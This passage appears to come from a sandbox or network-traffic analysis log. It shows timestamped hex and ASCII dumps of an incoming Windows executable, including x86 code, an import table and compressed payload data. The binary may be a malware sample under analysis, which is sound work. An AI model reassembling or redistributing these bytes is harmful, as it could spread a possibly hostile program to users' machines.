2022-11-07 22:49:08 UTC	7737	IN	Data Raw: b4 89 7d bc c7 45 c8 e0 4c 40 00 89 5d cc e8 d4 1a 00 00 89 45 c0 8d 45 b4 50 c7 45 c4 41 00 00 00 ff 15 80 81 40 00 85 c0 74 58 50 ff 15 a8 82 40 00 53 e8 41 13 00 00 a1 10 4f 43 00 8b 80 1c 01 00 00 85 c0 74 28 81 fb 00 08 44 00 75 20 50 6a 00 e8 90 1a 00 00 57 bf a0 2e 43 00 57 ff 15 28 81 40 00 85 c0 74 07 57 53 e8 57 1a 00 00 ff 05 58 d2 42 00 53 68 fb 03 00 00 56 e8 67 10 00 00 eb 07 c7 45 0c 0f 04 00 00 81 7d 0c 0f 04 00 00 74 0d 81 7d 0c 05 04 00 00 0f 85 98 01 00 00 83 65 fc 00 83 65 f8 00 53 68 fb 03 00 00 e8 3b 10 00 00 53 e8 c8 13 00 00 85 c0 75 07 c7 45 fc 01 00 00 00 be 38 b2 42 00 53 56 e8 da 19 00 00 6a 01 e8 a0 1d 00 00 85 c0 89 45 f4 74 3a 33 c0 33 ff 3b c6 74 32 8d 45 dc 50 8d 45 e8 50 8d 45 d4 50 56 ff 55 f4 85 c0 75 76 85 ff 74 03 66 Data Ascii: }EL@]EEPEA@tXP@SAOCt(Du PjW.CW(@tWSWXBShVgE}t}eeSh;SuE8BSVjEt:33;t2EPEPEPVUuvtf
2022-11-07 22:49:08 UTC	7753	IN	Data Raw: 74 65 72 00 00 b5 02 52 65 61 64 46 69 6c 65 00 00 75 02 4d 75 6c 74 69 42 79 74 65 54 6f 57 69 64 65 43 68 61 72 00 cc 03 6c 73 74 72 6c 65 6e 41 00 00 9d 01 47 65 74 50 72 69 76 61 74 65 50 72 6f 66 69 6c 65 53 74 72 69 6e 67 57 00 00 aa 03 57 72 69 74 65 50 72 69 76 61 74 65 50 72 6f 66 69 6c 65 53 74 72 69 6e 67 57 00 00 f8 00 46 72 65 65 4c 69 62 72 61 72 79 00 54 02 4c 6f 61 64 4c 69 62 72 61 72 79 45 78 57 00 00 82 01 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 57 00 00 f8 01 47 6c 6f 62 61 6c 41 6c 6c 6f 63 00 ff 01 47 6c 6f 62 61 6c 46 72 65 65 00 00 bd 00 45 78 70 61 6e 64 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 c1 03 6c 73 74 72 63 6d 70 57 00 00 c4 03 6c 73 74 72 63 6d 70 69 57 00 34 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 Data Ascii: terReadFileuMultiByteToWideCharlstrlenAGetPrivateProfileStringWWritePrivateProfileStringWFreeLibraryTLoadLibraryExWGetModuleHandleWGlobalAllocGlobalFreeExpandEnvironmentStringsWlstrcmpWlstrcmpiW4CloseHandle
2022-11-07 22:49:08 UTC	7769	IN	Data Raw: b9 af 0d f8 92 f4 7f 01 6e 7c 73 dd f4 ed 4b f1 25 e3 12 03 e2 bb 07 f1 1d e7 83 ef 03 74 5c 82 d1 ba c1 d7 1c 60 ca 20 02 f9 bd fc f7 10 df f6 ef 7d f0 0d 94 f1 0d 74 d1 b7 99 8e 36 bb 78 77 1e a5 ef 53 e1 73 36 01 a6 c5 9f 1d bb e1 45 df 79 6e fa f6 23 f8 8e 27 8d ae 01 f9 61 0b e2 fb fc fd de f8 ce a2 8d 6e 7c f7 d2 2d 28 f9 7e 22 dd 9c 7f 3b 74 03 f1 4d fc fe 97 e8 eb d2 95 b1 c1 bd e3 d5 e0 b6 d1 a5 a7 23 5e 0d 6e 9b 5b b4 85 10 54 4b d1 12 45 7c 73 38 0a 62 44 f5 7c b4 37 aa af 50 41 8c d1 7a 90 0f 47 ec 7f f6 43 74 7b 0d 7b f3 63 44 f7 95 26 9f f1 de 1d ed 0d c7 4e a8 2d af f5 42 97 a5 2b a5 8f ce f3 3f 8e ec 70 28 02 e4 da 1f bd c8 cc aa 5d 64 0e 25 b8 e7 12 dc d3 87 a1 58 46 dc 07 fb e0 be 91 e2 8e d1 d8 e9 be b8 d3 f9 20 c0 5f 15 fb f4 9b 88 ff Data Ascii: n\|sK%t\` }t6xwSs6Eyn#'an\|-(~";tM#^n[TKE\|s8bD\|7PAzGCt{{cD&N-B+?p(]d%XF _
2022-11-07 22:49:08 UTC	7785	IN	Data Raw: 43 35 fc 36 35 91 e6 20 2a 5c 3a 28 6e 66 d1 14 dd 40 84 d9 c0 64 f1 9c 9a e2 2b e5 4e 11 8f 53 b7 94 1b 2d 1e 71 39 c7 8b 7b 5d ce 49 e2 5b 2e 67 a4 f8 ba cb 39 5a fc a3 cb 19 27 96 ba 9c d3 c5 02 d9 b9 67 21 94 53 5c 81 3b af 8e 45 74 15 c8 8f 96 b9 99 96 59 2e 0a 6e ad c7 a2 ca 91 20 0a dd 34 d3 2c 47 69 b7 88 27 6e 77 69 ee d8 19 ae 9b c5 b0 91 d2 ca 59 e2 22 9c ea 4c 98 95 6e 22 9d 34 1b 12 8b fd 34 1b cc af d6 32 5c 80 45 5c 35 0c 37 86 e2 e4 fb ac 4c b4 3a b0 88 a2 81 9c ec 23 48 ae 1d 17 42 fb 0e 8b bc 85 61 90 45 dc 39 8a 9e 53 63 9f a7 68 bb 30 f8 c2 88 3a e7 b3 24 d8 2a 59 c4 4a 12 46 f6 5d 64 a5 e6 2c 56 91 c3 65 6e 04 b8 a7 9b fa 90 8d 16 18 5b 7c 15 a2 a6 38 87 a6 ca 9f 9b 69 ca 01 5d 11 9e 1d 85 ea c0 63 78 30 8b 73 40 0e e2 9e 2a fe 09 e9 Data Ascii: C565 \:(nf@d+NS-q9{]I[.g9Z'g!S\;EtY.n 4,Gi'nwiY"Ln"442\E\57L:#HBaE9Sch0:$YJF]d,Ven[\|8i]cx0s@*
2022-11-07 22:49:08 UTC	7801	IN	Data Raw: 13 f5 b3 aa e6 65 54 e8 3e 70 f0 0d 4a d5 6f a7 28 90 d3 60 9f 16 96 96 6a c1 b3 7f b7 32 2e a2 8c 42 12 58 20 04 1e 3d 84 69 ed d3 0c 10 83 16 38 10 67 22 f3 0d d0 1e 31 11 6a 68 e9 42 bb f8 d2 7a 52 ce 7b 4a 24 76 e4 a5 69 61 a0 87 86 41 53 d4 03 93 60 83 9c a6 07 ae 01 38 69 e2 35 b2 dc 1f e1 0c 4b 13 f7 f9 91 6b b0 89 ec 10 c7 5c 81 36 3a 2d 2c dd 4d 95 ad 8f 78 53 85 6f 8a 30 d6 c4 d3 f9 c1 eb fc 37 43 5b 2b 34 6c 48 71 92 9e d5 25 8b 83 d0 5e 99 ff a6 ad f1 5e b4 00 ac 18 61 d6 03 6d f4 56 35 35 64 e6 bf b9 d5 d8 07 02 8a eb 75 c5 78 7a 4b ab 59 af d1 15 e3 71 45 20 5a be fc 8a 5c c6 92 ee 9a d5 9d 43 67 75 27 d2 59 dd 41 a6 72 ee 09 21 49 5b ff c3 c5 81 d0 b2 fc 5e 06 e6 05 76 7e 6e 96 33 d1 ed 8b df a3 69 90 73 9c a7 ef b3 77 c9 be 77 79 f9 6a 68 Data Ascii: eT>pJo(`j2.BX =i8g"1jhBzR{J$viaAS`8i5Kk\6:-,MxSo07C[+4lHq%^^amV55duxzKYqE Z\Cgu'YAr!I[^v~n3iswwyjh
2022-11-07 22:49:08 UTC	7817	IN	Data Raw: 3f 52 71 46 92 10 dd 2e 56 a2 f6 08 47 30 57 74 05 53 67 4f e8 27 4a c6 fc 21 5e a0 b6 a9 12 5f 1d aa c4 75 94 03 e7 bc dd 81 e3 b6 54 a2 f5 b1 58 dc 32 79 3d 34 6a f8 40 ab 20 15 77 1c 17 e2 ed db 95 f8 ba a7 27 d4 f8 b9 42 d2 02 1e 7c ae 48 c0 95 6a ba f0 74 67 25 ea 52 5e 5a 4a da a4 57 d3 0e bc 98 54 89 75 17 63 31 78 f8 7a 78 d9 c1 07 06 a7 a5 a2 ea 15 21 86 bf 20 1b a1 be 30 79 95 23 bc 9a ea 09 81 af d2 d1 31 32 11 2f 1f 8b 47 e1 8d 04 ec ad a1 0b 5d a2 2a 71 04 c5 b6 d2 cd 1d 38 a9 a7 2e 6c f0 e3 c1 de 53 51 b8 fc 6e 3c ea 48 52 f1 94 17 17 82 66 eb 82 8a 8e 2f 5c 6b 4a 47 c5 c4 44 b4 be 94 8e 4a 8f 12 71 31 d9 6a 4f 8b c3 09 16 3c 98 5c 9d 80 39 0a 7c 48 5e a9 0b fc a9 13 e0 c3 ab db 98 14 59 8e d5 a4 cd ce 53 6c a7 f4 f5 03 01 d9 7a 78 22 16 2b Data Ascii: ?RqF.VG0WtSgO'J!^_uTX2y=4j@ w'B\|Hjtg%R^ZJWTuc1xzx! 0y#12/G]*q8.lSQn<HRf/\kJGDJq1jO<\9\|H^YSlzx"+
2022-11-07 22:49:08 UTC	7833	IN	Data Raw: 54 4f 65 b5 eb 22 65 8b 37 98 11 38 1e 7b d7 fd 2c c0 cb 4d fe 9d 0f f7 52 82 a9 a9 63 15 56 9f e4 06 f3 88 9f 7f 76 af 2b 5e 35 1e 84 4a 87 5a f0 75 04 37 f8 21 0b e0 c8 35 cd c2 cb 17 90 bf 61 e0 02 33 47 7e 70 97 ce 7b 31 a2 ea c2 1e c1 50 27 b0 99 a8 13 cc d6 7a 22 14 0a 29 cf 59 5e d1 8a 62 65 b6 60 5e 45 e4 b7 8a eb 68 53 3d 84 0d 7d 5e 64 73 0f 2c 54 84 97 e6 86 d9 73 ef b6 62 dc 25 b6 c6 0f d2 21 fb ad 7a 2a db 34 d8 08 85 c1 8a 50 3e 4a 59 e1 d4 bd 6c cd ef 46 00 6d 0b 1a 35 87 13 b7 ce a8 89 2c 1d b9 f9 10 bc da cb 6f 77 a9 6f f4 6f 99 a0 0c f7 fd d6 f4 7f e5 0c 21 49 0b a2 23 f5 89 3b 93 4d db f1 92 36 2b 78 ba a5 13 a6 2a 28 c3 87 ef 91 df 66 3b 40 f6 db 97 91 e2 c7 1d 3c f8 5b 0d 41 58 ba 52 11 36 a6 82 b6 d7 f8 98 1f fd d2 94 e0 cc 14 56 af Data Ascii: TOe"e78{,MRcVv+^5JZu7!5a3G~p{1P'z")Y^be`^EhS=}^ds,Tsb%!z4P>JYlFm5,owoo!I#;M6+x(f;@<[AXR6V
2022-11-07 22:49:08 UTC	7849	IN	Data Raw: 06 0f 5c 85 79 34 a8 7d ed 1f bd f3 e0 b5 d8 46 93 31 e8 bc 72 4b 82 9d 5c 11 74 c6 4e c5 36 1e c7 83 da c5 98 04 3b c1 36 50 3b 5d 65 5b 69 c2 fc df fd 7c d3 6d ff 78 5f 02 4e 5f d4 b3 7a b7 e0 e8 25 0f a0 fa da 24 37 dc 83 7e 08 7f bf b2 ad 1c ff 0a c0 a4 71 75 ec 9f 33 10 ae 99 e0 c5 72 9a 01 08 da b1 2a 61 f9 ae 45 b8 7a e1 6f 6c d1 ca 45 78 c7 65 55 93 cc af 28 d8 79 6e 74 99 60 58 78 76 cb 06 30 da 69 53 29 dc 74 0b 42 d2 b6 26 b7 c0 30 08 97 2a 32 85 fb 82 53 85 89 7e 1e be e1 46 b0 4b 35 2a 53 d8 cf 02 d7 a2 37 e5 08 3b c7 a1 06 a3 98 03 5b 99 28 e9 41 3a a5 f2 d5 a3 66 b8 a6 1b 29 15 44 b4 85 be db da 04 8f 9f d4 ce aa 93 02 05 29 5b 43 85 8b 64 40 bf a2 1c a9 c7 ce b5 41 04 b9 eb 6c 28 6f 85 ed 53 2a 21 0d 9c d3 05 c8 ab d8 da 84 2b bd f7 af c6 Data Ascii: \y4}F1rK\tN6;6P;]e[i\|mx_N_z%$7~qu3raEzolExeU(ynt`Xxv0iS)tB&02S~FK5S7;[(A:f)D)[Cd@Al(oS!+
2022-11-07 22:49:08 UTC	7865	IN	Data Raw: 38 7a 4e 6e a6 ce cf 07 4b df 21 96 77 1a d2 c4 d2 b7 6d 9f a9 f3 7e ba 40 53 bb 21 ef c4 ed 5c a0 79 fe c4 39 3d 5a 81 03 b7 2e d0 9b 5b 95 d1 0f 45 76 58 d0 c5 71 81 77 af c0 6f bc fe 6f b1 ba 56 18 d0 17 ae 69 af 27 9a e6 5e 36 50 53 3e 2b f1 85 7b 0b 93 50 fb 16 54 3f 51 03 45 dc 4e 64 c3 f3 11 00 d6 1d 43 94 64 5f 4b 32 c8 88 2c eb e5 a0 be 98 b9 37 23 f3 70 8c 24 8b f4 24 7e 81 51 05 b8 05 07 24 22 12 1d fb 31 a1 ea 77 6e 82 ac a4 b0 0b 1d 62 de 1d a7 a6 dc fc 1b 37 42 21 ab a7 2c c1 31 20 51 c6 b2 04 61 e2 8c 76 64 66 37 6c cb 72 50 b0 60 8d f2 5d 05 fc df 59 10 da 0b 15 69 c6 89 00 cc 2b 92 35 76 ac c1 31 e4 db e6 04 f2 7d e9 94 73 36 d0 dd e4 3b 00 dc 76 d2 74 d7 ba 32 d9 44 cd 33 93 f4 cc 9c 1c 6f 80 d6 8c 3e 54 a4 4d 5f c0 c4 7e 38 10 26 cd f8 Data Ascii: 8zNnK!wm~@S!\y9=Z.[EvXqwooVi'^6PS>+{PT?QENdCd_K2,7#p$$~Q$"1wnb7B!,1 Qavdf7lrP`]Yi+5v1}s6;vt2D3o>TM_~8&
2022-11-07 22:49:09 UTC	7881	IN	Data Raw: 17 20 fe 27 07 30 ee 14 e2 fd 47 c6 60 ff 0e 71 f3 04 80 67 67 10 3d d6 d1 d7 52 37 1c d7 4f 67 91 82 28 bf ba 00 2b be 22 66 93 d6 e3 83 00 c7 0b 10 dd a8 8f cf 0b 04 08 bb 4c f7 7d a5 09 1c 6b a2 7b 70 14 60 ee 75 c4 86 b1 e7 1e 28 01 9c e5 d1 39 6d 07 d0 7b f5 0c e7 77 20 7e 23 2d b7 8d 00 b5 a4 e5 f7 17 91 ef 02 a0 fb 80 ce 64 85 09 dc 23 2d 05 0e 40 21 f1 66 4b bc 9d 10 07 08 38 8f 58 67 67 02 66 f8 0c f9 c1 88 17 89 b7 87 86 34 0b d3 00 b2 4e 22 26 91 d6 ed 97 b4 87 a8 c7 2c 89 40 04 62 40 65 09 80 b1 02 c0 64 77 80 db c4 9b 4b 25 3d 16 62 a0 3c 81 58 fc 8f ae 69 01 c0 6b 29 00 19 e2 6d 46 1e 62 0d 69 99 91 d6 5f d2 32 7c 42 df 93 09 f0 93 01 e0 41 5a f5 c4 76 12 f1 16 48 bc 19 5e a1 f9 25 06 56 93 d6 d8 6b 8c 15 93 d6 5c 62 7b 3c f1 d6 49 7b a6 81 Data Ascii: '0G`qgg=R7Og(+"fL}k{p`u(9m{w ~#-d#-@!fK8Xggf4N"&,@b@edwK%=b<Xik)mFbi_2\|BAZvH^%Vk\b{<I{
2022-11-07 22:49:09 UTC	7897	IN	Data Raw: 71 5f 7d 7d f9 61 06 f0 d6 b6 8a a8 cc 16 85 16 3a c7 27 a9 03 78 9d ee e7 07 0d 1d 1d b5 11 21 ce b1 73 94 b0 5b 25 0e 3b 28 13 2e 0f 19 c0 b3 d4 71 7d 88 81 dc 16 44 f7 93 af d1 d2 da 1a de ea db 42 bf a2 19 ec 8f ca c4 a0 cc bb 18 5c 91 8e ba f2 1b 61 7b fc 5d 7c 42 d9 55 7d 6e 97 50 5b 86 01 ef 4f 0b f1 d1 a3 1a b4 fc 2c 44 ef a1 1a d4 4d a6 4e 4f 6c 7b 68 88 81 1b e5 9d 05 94 5d d5 28 af ee fa fe 7f cf 0b 73 b5 d9 0a b3 96 7b c0 e0 54 57 e0 f9 9a 83 d8 b5 44 4c 2e 7b 88 a7 db 53 30 84 66 eb 30 65 9f f3 2c 1d e8 96 5b 0a b3 5d 75 a0 e7 ee 79 8c fb 40 f7 e1 4f 2f de 3e b4 06 ca d7 b9 c0 a2 79 76 d0 35 14 86 4c 07 3b f0 7c cc c7 25 5f 11 63 45 dc 80 7f 21 19 b3 9f f1 71 c3 f4 f5 70 2d 70 0d 9c dc 0b 60 5d dc 87 af 7f e6 61 44 78 22 4e db 65 0a 42 3d 4f Data Ascii: q_}}a:'x!s[%;(.q}DB\a{]\|BU}nP[O,DMNOl{h](s{TWDL.{S0f0e,[]uy@O/>yv5L;\|%_cE!qp-p`]aDx"NeB=O
2022-11-07 22:49:09 UTC	7913	IN	Data Raw: c3 e8 b2 4c 85 ce 32 ab 59 5f 1f c9 b6 86 7d a4 4b 35 ae fa 98 62 35 1e d5 a4 b7 3f 87 85 b2 5f bc 8e f5 0a a2 79 ae 9e 0f 44 75 98 76 a6 45 c5 ba 9e 56 b0 2a 8f e3 8d 79 6e 08 1b 31 0c 4b 3a ba 20 e4 67 02 13 b6 ef e6 80 73 89 dc d3 ce 09 59 55 ff 3d a3 be ae de d1 f4 4a ee 78 5a c9 5d 4b 4d 50 6b 6f 25 03 ae 16 b1 6f 53 e0 a4 cc 0a 94 59 73 24 db 77 1b 02 2a 61 d7 b7 f1 e4 2e 39 2b 3d eb b9 e0 8b 8f 1f e6 25 44 b0 ce ad 14 66 94 47 b1 d1 3c 07 dc 3e b3 8d 55 c5 81 5f ea 03 11 1e 66 70 1d 66 86 17 8f 0b e8 5d 55 09 2b c9 76 eb 8b 65 34 79 96 4a af a5 de 70 9a ae 40 fa d5 60 76 7a a9 a3 c9 7a 2d 4f 4c 96 7d 79 5d 43 ed 87 58 1a 06 2a b1 63 9c 70 b0 a5 1d 4c 3e 93 0b 7d ea e1 42 42 0a cd bb 7b 61 d6 d7 f3 dc 3d d7 1f fb 47 f9 61 72 17 5f fc fc 15 cd 43 92 Data Ascii: L2Y_}K5b5?_yDuvEVyn1K: gsYU=JxZ]KMPko%oSYs$wa.9+=%DfG<>U_fpf]U+ve4yJp@`vzz-OL}y]CX*cpL>}BB{a=Gar_C
2022-11-07 22:49:09 UTC	7929	IN	Data Raw: 2f e0 c2 87 12 06 06 da e3 d5 38 2f dc b4 1c 8a 65 9f 43 b9 3d 22 8c 4d 9c c4 bd ba ab 50 5e db 07 83 b7 4a 4e c5 4b bf de 8d e5 e0 6a 4a 0c f5 70 40 ab f3 a1 ac e8 a0 80 ad 78 69 eb 99 7e 48 17 26 9f d0 da 00 ad 57 a6 d0 4f 1c 78 fc e5 38 b6 6c e1 87 91 8b 54 78 72 30 e2 7f f7 b2 09 78 5b c8 97 01 a6 30 1b 67 83 2f b9 99 b4 a9 0b a8 36 97 72 e5 18 07 b8 dc 10 3f ab ed 87 a2 ad 3a de 3c 95 c8 85 c2 c9 11 35 81 4b c2 c9 33 ce c6 f2 b5 f8 76 c5 df 23 6c 39 db 1d 59 83 02 e0 f2 84 4c 5e de 01 09 fb 92 18 d8 df 03 b7 5e 45 f1 f5 12 35 0c a5 df fa 5c 8b 66 f2 db 18 2e 0e 00 86 8d b5 d0 ef 95 95 5e 31 ef ed c5 8a e1 21 57 2b 86 8f 34 46 bb 6e 83 f4 e3 7f e4 55 14 ab 8c 71 65 a4 19 e2 bb f5 c2 ab bb 79 5c 3c c7 1c 19 67 8b 59 61 a2 46 e7 df b1 ac 98 a5 44 cf 41 Data Ascii: /8/eC="MP^JNKjJp@xi~H&WOx8lTxr0x[0g/6r?:<5K3v#l9YL^^E5\f.^1!W+4FnUqey\<gYaFDA
2022-11-07 22:49:09 UTC	7945	IN	Data Raw: 9a 14 77 b8 63 2b 92 b7 27 99 94 30 b6 75 c6 09 91 14 32 b4 cd 8a bb fa 83 f4 7e 75 4f b0 99 a5 52 aa 70 f5 a6 60 da fa ce c5 a0 e0 4b d8 ca a7 e5 3b 65 8a 1a e8 81 b5 ad 0d b3 6f d6 88 a9 86 ed 1d 97 69 48 fd 8f 93 4f f9 ec dd 6d 56 53 38 07 62 c4 ec 05 d5 e2 14 06 35 17 81 42 54 1b 26 e9 d4 49 a1 b1 7f 93 59 d0 af dc 6d e7 68 3f 75 a8 69 0f 8a 97 4f b0 9e f5 c7 89 93 63 be 1f 6e 97 68 37 df 36 eb 33 c9 58 b3 ef fb f4 e4 24 ed 46 12 26 a6 f8 e2 c3 16 1f 89 44 e9 69 e5 75 be fb df aa 92 f8 f4 aa 62 19 e1 37 63 b7 63 63 98 3b be 80 43 b8 24 cd ec b5 fa 36 2f 32 7f fa a4 e2 c6 1c 75 b8 ee 0c 8a f7 87 45 7d d4 5d 0c 02 91 9f 08 a9 6f fc f9 b1 e6 6d cc ea 76 61 31 8e f7 1f 87 e6 ef 37 6e 31 3f f5 af 2f 3a 57 e6 15 dc d6 f2 0e 89 be 55 77 fb d0 de dd d8 a7 eb Data Ascii: wc+'0u2~uORp`K;eoiHOmVS8b5BT&IYmh?uiOcnh763X$F&Diub7ccc;C$6/2uE}]omva17n1?/:WUw
2022-11-07 22:49:09 UTC	7961	IN	Data Raw: d4 0d 7c 50 bc c3 a4 1f d6 95 d9 eb 57 7f 6a 6f 19 5a 45 4e de f4 b7 2a 57 b0 d6 0b 80 1e 44 ca db 87 dd 4f 6f bc e6 d8 d6 c3 cc 47 02 af 97 04 1d 8f 35 fa a2 c3 f8 04 9e 47 40 85 24 76 f5 70 9a ba 20 84 e8 b8 a6 55 8e 03 31 3d a9 e1 00 dc fc 80 20 72 52 d3 19 17 9c 3b c9 e8 3d f6 82 e6 8b 98 9f 67 3b 21 e1 da c3 78 53 76 ae 86 16 b9 99 91 ed 7a 20 4d 3a 71 82 54 8f 77 6e 5b 5f 5f 6c da af 46 22 b8 9c 20 e1 5b fc 7c d0 36 14 b6 27 5c 6c d8 fe ba e1 4e 78 1d 40 31 4f 76 9c 68 3f a2 42 d3 1b ab 87 78 f4 cb 09 ea 04 83 a0 f7 fd f0 61 38 95 49 40 24 7b 8d 93 06 c4 24 7b 1c 73 e0 d3 f4 0d f9 e6 99 45 f8 ec bb 22 5e dc c6 8d 6c d1 e1 d4 6b a1 9b d5 04 e7 7b 9e 85 80 b8 23 bd d3 a5 ef 61 19 27 b0 df 77 49 3e 52 7b c9 e4 d9 1e 8f 00 80 63 e7 6d 72 3d cc 95 fc 00 Data Ascii: \|PWjoZEN*WDOoG5G@$vp U1= rR;=g;!xSvz M:qTwn[__lF" [\|6'\lNx@1Ovh?Bxa8I@${${sE"^lk{#a'wI>R{cmr=
2022-11-07 22:49:09 UTC	7977	IN	Data Raw: 27 4f d2 4a 49 df 14 7e 6b 7b 49 23 df ec e9 0b 71 23 82 be 73 8f a2 70 c2 94 6a bd 3c 36 e9 82 25 d2 c6 80 ef 2f f2 6c e7 a6 93 7e 7a 64 43 81 d5 0a 21 c0 ff 85 c5 9b 9d 45 30 c9 de 51 72 75 0f d1 d8 c2 a1 b4 74 f8 a4 97 f0 5f 01 84 cf fb a1 ef e4 b0 1f 6a 6f 9e 3c c1 dd 89 aa 9a 2e c0 10 3b 42 84 02 56 3b 8c e1 3c 42 26 bb b4 29 1c ce 2d d2 46 cd 22 98 bf ef 4b 2e 39 67 d8 17 4d e2 51 71 8f 76 3a aa 9c 66 45 c0 ed bd a5 a4 76 27 00 4c 94 1a d0 79 1f 10 9d 96 bd 38 b4 0e a3 b2 2d 9c 0c d1 a6 75 c2 db 37 a7 60 c0 57 83 34 78 ea b3 ac 7a 3e 3b 27 d9 71 96 79 c3 db 2c 72 53 fa 27 20 e4 5e 86 f0 f3 16 19 26 e3 0b b4 5f 73 a5 52 ac 1e 25 7c e6 aa 58 5b 3f 15 42 86 d6 ed 03 70 25 09 bc 4e a1 64 80 bf 13 00 ac 1a e1 e3 37 3c 64 c0 47 18 6b eb cc 2b 82 fe b8 ff Data Ascii: 'OJI~k{I#q#spj<6%/l~zdC!E0Qrut_jo<.;BV;<B&)-F"K.9gMQqv:fEv'Ly8-u7`W4xz>;'qy,rS' ^&_sR%\|X[?Bp%Nd7<dGk+
2022-11-07 22:49:09 UTC	7993	IN	Data Raw: 30 00 01 02 ee 20 9a ff 05 71 8e ab ef d2 da 7c 6b 16 52 8a 9c 8d a7 ce 4c d4 ad 69 9c 1d db 1d ee 3c f3 68 74 14 be 68 87 ea 65 95 e8 b4 f9 35 29 ac a9 af c3 f8 fb 68 82 7d 27 41 75 fb 10 84 3c 02 84 25 3b 11 a5 b4 a7 e8 fb 13 bf 65 f0 84 d1 17 e4 6c d6 32 54 e7 c5 4a 74 f5 4f 0b ce 63 3b f0 5f e4 26 11 be e9 46 8d 62 9f 4f 8f 86 4d 42 d8 56 03 e1 98 b3 d9 eb 17 f7 e3 54 05 1f a1 5c d9 37 71 4a 7e 14 28 dd 56 76 7c ed dc 38 0a dd 9e c2 5c 02 c9 ae c6 45 aa e9 72 a5 08 e6 1e 98 85 be b7 94 99 3a 98 a2 6f b1 95 eb 50 aa 37 cb c3 6e d9 2c a6 6e a5 43 81 b2 4d 2e d3 96 f3 05 87 ec b8 d1 a2 ec f7 19 95 39 1c 99 f5 3f 31 2c 63 da 29 17 28 d1 3a e3 6c fb 6b a4 10 6f 47 a8 34 73 83 92 88 1f c8 b2 bf 12 a0 b4 f3 ca 8f 95 69 ed 71 2a df 3e 42 68 e2 9d 38 1d 7c 0b Data Ascii: 0 q\|kRLi<hthe5)h}'Au<%;el2TJtOc;_&FbOMBVT\7qJ~(Vv\|8\Er:oP7n,nCM.9?1,c)(:lkoG4siq*>Bh8\|
2022-11-07 22:49:09 UTC	8009	IN	Data Raw: 9b 07 d4 77 56 30 2f 3f b8 87 1b 6b 1e 78 08 28 62 74 b0 1a 31 41 30 29 a1 e6 b8 d6 a2 bc c0 0d b5 6c 95 75 eb 6a cf c8 34 f3 0a 17 c3 f5 92 fa 66 89 71 e3 f8 cd 12 4e 63 f8 19 6b b8 32 12 8e b9 97 6d 5d 25 5b 0f e4 0e dc 48 3f fd 18 d6 8e 83 6d e5 e6 8f 5e 89 1f c2 b1 10 3f 8f 93 b2 6e d3 7a 54 5f 00 48 6d 0d 18 b5 04 7b b0 e7 b7 9c 9e 82 3c 6f da de 0f c1 c7 1e 07 c1 b6 63 85 6c b9 f5 a6 ba e3 b7 3a c9 2f aa 98 a2 d8 73 b2 61 01 af 89 c9 11 ee d1 cc ef c9 39 f0 2a d8 7c 00 40 eb 52 30 dc 59 03 db c4 5b 19 8c b3 2f c5 62 f7 89 0c c6 ad 53 62 f1 98 1d 6a dc b5 79 62 c3 cd 98 c6 2d ba 37 b8 b0 64 8b b0 d5 fc e4 96 51 f7 bd 7f 0c 6e ee ab e6 8e f7 3a fe e7 99 bd e2 22 a7 0f dd dc fc 33 83 26 82 06 8e 42 ff 63 d1 cc 23 9e 11 1a 21 5b 2e a5 9a 38 e5 8b c7 a9 Data Ascii: wV0/?kx(bt1A0)luj4fqNck2m]%[H?m^?nzT_Hm{<ocl:/sa9*\|@R0Y[/bSbjyb-7dQn:"3&Bc#![.8
2022-11-07 22:49:09 UTC	8025	IN	Data Raw: 54 84 28 49 bc 49 0a 29 6b 50 66 32 3a c0 82 d1 94 15 22 29 3b db 12 6f ac 7f 42 1c a0 6c 28 a4 8c 1e f2 1d 71 37 ad ff 48 26 66 97 0b 71 bb 0c 90 c7 61 01 97 fa 48 2b 65 a4 bf c4 76 e5 39 21 fa 52 36 4c af 16 a2 7e 07 f1 ad c2 82 58 d2 52 43 ca 48 33 c8 27 fb 27 0b 71 0b f9 64 29 d2 e7 6e 62 3b dd 83 e6 93 7c b2 2b 65 b2 3c f2 c9 6b 9a 85 78 fe 28 5d 1f 8d 6b 02 f9 e4 e5 94 35 35 c8 27 bb df 13 a2 27 65 c1 f3 94 f1 e6 11 6f 83 ab 68 5e 88 ed c6 3e 21 ae 26 dd e6 3d 15 a2 03 f9 e4 25 43 42 34 25 b6 ab 69 3c ca 1b c8 a7 d2 7a 19 8d a7 0c 73 98 32 1e b1 7d 6e 64 af 91 4f d6 a4 f9 79 72 19 f1 2d ad 5f 21 65 7d 3e cd 5f 3e f1 36 64 c2 82 05 23 3e 99 b2 fa 57 f2 c9 be b4 5e 9b c8 27 4f a6 f5 8b a0 4c f6 80 b2 dd 1b ea 23 d2 89 42 6c 5a 4e 7d 91 d6 6b e4 3b 29 Data Ascii: T(II)kPf2:");oBl(q7H&fqaH+ev9!R6L~XRCH3''qd)nb;\|+e<kx(]k55''eoh^>!&=%CB4%i<zs2}ndOyr-_!e}>_>6d#>W^'OL#BlZN}k;)
2022-11-07 22:49:09 UTC	8041	IN	Data Raw: c4 ea 62 08 c1 ce 7f bd c0 db 92 28 6f 21 09 e5 91 63 01 e0 fd 47 31 9f e6 8b d0 42 d0 05 ab 58 d2 1c 39 50 3d 88 5f 21 6f 7d 3f b1 ad 04 16 2f 16 64 36 91 9e 76 89 9d 9d dd c7 96 8c 4b 24 2d 5d 4b ce 6a 98 97 46 ce be f3 50 44 71 df 54 67 bb 1f ef a3 c9 96 c0 ea 35 70 2d 81 cc 19 58 1f 26 74 9f 0a 46 0a e6 8b 06 95 81 02 42 13 0e 04 ab a8 4d 98 c6 64 82 3f 61 3b 33 8b 8a 5a 04 85 c9 41 29 b0 6f d7 2c 9f 18 46 41 cb c2 ee bb 34 99 1d b0 a0 fb f1 1f f8 3e aa 56 09 e5 35 5c c1 0b a7 4b 69 3f 2d 22 81 cd 8b 31 be bf 5a cc fd a2 1c e9 61 5d 68 02 07 0e db 13 f9 14 6e a7 84 3f 8e 5e 2c 38 e8 d3 e4 bc 53 bc 9b 1f 45 7e 55 d6 1d be 65 91 b2 9d f2 81 5e af 04 5c 1e 24 23 2f aa bd 57 62 4b fc 80 e2 d7 58 5f cd 84 3e 80 15 55 de 6c f6 7c 75 f6 f2 69 ec f0 88 91 b5 Data Ascii: b(o!cG1BX9P=_!o}?/d6vK$-]KjFPDqTg5p-X&tFBMd?a;3ZA)o,FA4>V5\Ki?-"1Za]hn?^,8SE~Ue^\$#/WbKX_>Ul\|ui
